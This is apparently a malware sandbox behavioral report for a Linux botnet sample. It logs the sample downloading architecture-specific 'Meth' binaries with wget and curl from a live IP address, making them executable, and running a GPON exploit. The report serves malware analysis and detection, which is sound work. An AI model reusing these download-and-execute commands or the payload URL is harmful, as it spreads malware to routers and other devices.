[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |
Files
memory/685-1-0xb672b000-0xb673c044-memory.dmp
memory/724-2-0xb6725000-0xb6736044-memory.dmp
memory/738-3-0xb676b000-0xb677c044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
debian9-mipsbe-20240729-en
Max time kernel
79s
Max time network
80s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |